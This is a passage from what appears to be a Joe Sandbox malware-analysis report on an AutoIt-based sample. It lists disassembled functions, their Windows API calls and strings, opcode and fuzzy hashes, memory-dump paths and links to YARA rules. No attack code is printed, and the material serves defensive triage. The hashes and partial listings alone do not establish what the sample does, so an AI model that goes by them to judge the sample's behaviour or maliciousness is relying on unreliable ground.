                                                                                                                                        • Opcode ID: d89bde983a83bb22ad01d772c558e5d07b41c184a31116cac1b05b9ddd8d9f45
                                                                                                                                        • Instruction ID: 1abeba4033c0d160e375c61385cfa02d27d09ee64e7911ef74517cafcd8b0d52
                                                                                                                                        • Opcode Fuzzy Hash: d89bde983a83bb22ad01d772c558e5d07b41c184a31116cac1b05b9ddd8d9f45
                                                                                                                                        • Instruction Fuzzy Hash: 5301A271741108ABCF15EBA4D966EFF77AC9F09340F140125B943E32D1DA5C5E08A7B1
                                                                                                                                        Function 0079C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 0079C562
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                                        • Opcode ID: e35d72a0d8ee63c51bb2d9373f1afd8fdc6efe7456b7e3d3e3a30c04c847b17e
                                                                                                                                        • Instruction ID: ee68c747c05bd4566e22954a5ac61a9c50e51eecc6af466181e940474b25f073
                                                                                                                                        • Opcode Fuzzy Hash: e35d72a0d8ee63c51bb2d9373f1afd8fdc6efe7456b7e3d3e3a30c04c847b17e
                                                                                                                                        • Instruction Fuzzy Hash: 3301D171A41108ABCF06EBA4D956EFF73AC9F05741F244115B943F32C1DA5CAF19A2B1
                                                                                                                                        Function 007A804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassName_wcscmp
                                                                                                                                        • String ID: #32770
                                                                                                                                        • API String ID: 2292705959-463685578
                                                                                                                                        • Opcode ID: 46dede306a260adbe90998848907a0ebab66e6f6eb74dc292cb28a1148bf327a
                                                                                                                                        • Instruction ID: 0398483ba3ffafeb9ef87bb4eb49934cedd8b980adb7df05a668fa8d11435a37
                                                                                                                                        • Opcode Fuzzy Hash: 46dede306a260adbe90998848907a0ebab66e6f6eb74dc292cb28a1148bf327a
                                                                                                                                        • Instruction Fuzzy Hash: 94E0D83360022967D720EBA69C4AED7FBACFB517A4F000026F924E3141D678AA8587D4
                                                                                                                                        Function 0078DA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __umatherr.LIBCMT ref: 0078DA2A
                                                                                                                                          • Part of subcall function 0078DD86: __ctrlfp.LIBCMT ref: 0078DDE5
                                                                                                                                        • __ctrlfp.LIBCMT ref: 0078DA47
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __ctrlfp$__umatherr
                                                                                                                                        • String ID: xn}
                                                                                                                                        • API String ID: 219961500-1885973330
                                                                                                                                        • Opcode ID: 0a51d3b2eca2f8071aff56fbdff7e49d96088bf4111816aa99958629369408b9
                                                                                                                                        • Instruction ID: c90879ba6dfbaebe11e1414c96688d53ec4360aceb6a7f06882516d1abd56419
                                                                                                                                        • Opcode Fuzzy Hash: 0a51d3b2eca2f8071aff56fbdff7e49d96088bf4111816aa99958629369408b9
                                                                                                                                        • Instruction Fuzzy Hash: 6EE06D7144860AEADB117F80F80A6A93BA5EF14310F808495F99C140D6DFB688B49767
                                                                                                                                        Function 0079B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0079B36B
                                                                                                                                          • Part of subcall function 00782011: _doexit.LIBCMT ref: 0078201B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message_doexit
                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                                                        • Opcode ID: c2cb003025ad84daf081080ae667606ba42b094724fdb70ad01ebdef09002e92
                                                                                                                                        • Instruction ID: 0f8cf5d92be8f49289a733fb1fb6ec780d387af680b0d9c0620104271de852df
                                                                                                                                        • Opcode Fuzzy Hash: c2cb003025ad84daf081080ae667606ba42b094724fdb70ad01ebdef09002e92
                                                                                                                                        • Instruction Fuzzy Hash: F6D05B313C535C73D21536A87C0FFD9768C8F09B92F004415BF08996C28ADD98D092D9
                                                                                                                                        Function 007DBC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 007DBAB8
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007DBCAB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                                                                        • String ID: WIN_XPe
                                                                                                                                        • API String ID: 510247158-3257408948
                                                                                                                                        • Opcode ID: e6435f9fb3dc77a218419946d7c734bfd75c26e3d0cae1299cd407101853d789
                                                                                                                                        • Instruction ID: c34f9bb89249755e118e3605e23325f6d286625b475870a9d98554b42abbc44d
                                                                                                                                        • Opcode Fuzzy Hash: e6435f9fb3dc77a218419946d7c734bfd75c26e3d0cae1299cd407101853d789
                                                                                                                                        • Instruction Fuzzy Hash: 3AE0AC70C0414DEFCB15DBA4C845AECBAB8BB48300F55C486E522A6250C77959459F29
                                                                                                                                        Function 007C84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C84DF
                                                                                                                                        • PostMessageW.USER32(00000000), ref: 007C84E6
                                                                                                                                          • Part of subcall function 007A8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A83CD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                        • Opcode ID: 260f718bd32ec0be7ef1c1f2bcdf64683f617e393de6138c798a6bdbebf6560e
                                                                                                                                        • Instruction ID: f22a08078adaf7d42aafa3c106b358660a094c2eae3cd8fc2964412841dec8ae
                                                                                                                                        • Opcode Fuzzy Hash: 260f718bd32ec0be7ef1c1f2bcdf64683f617e393de6138c798a6bdbebf6560e
                                                                                                                                        • Instruction Fuzzy Hash: 27D0A7713813407BE67463309C4FFC66504EB18B40F0009147205A91C0C8A878008214
                                                                                                                                        Function 007C8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007C849F
                                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007C84B2
                                                                                                                                          • Part of subcall function 007A8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A83CD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                        • Opcode ID: b859b7e5160a28a421fcc5aa1436a6e84596aad4a7bccac046c40764ac596bdd
                                                                                                                                        • Instruction ID: 8e258c67b8d0346d0025e448af50b8cf78449448c3d2adf94ce96f94e3b47499
                                                                                                                                        • Opcode Fuzzy Hash: b859b7e5160a28a421fcc5aa1436a6e84596aad4a7bccac046c40764ac596bdd
                                                                                                                                        • Instruction Fuzzy Hash: BDD02371345340BBD77463309C4FFC76904EF18B40F0009147309AD1C0C8E87C00C214
                                                                                                                                        Function 007AD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 007AD01E
                                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 007AD035
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                        • String ID: aut
                                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                                        • Opcode ID: bb04014d40eb56575f9aed924a0f3b77f0bff43c9f818c926f3db32e5343176b
                                                                                                                                        • Instruction ID: bb540a0c37a5323644d039b05bbe2651667025829dc46da980940e59b09f04a8
                                                                                                                                        • Opcode Fuzzy Hash: bb04014d40eb56575f9aed924a0f3b77f0bff43c9f818c926f3db32e5343176b
                                                                                                                                        • Instruction Fuzzy Hash: 2CD05EB154130EBBDB20ABA0ED4EF997B6CBB04704F1081907714D90D1D2F8DA458BA4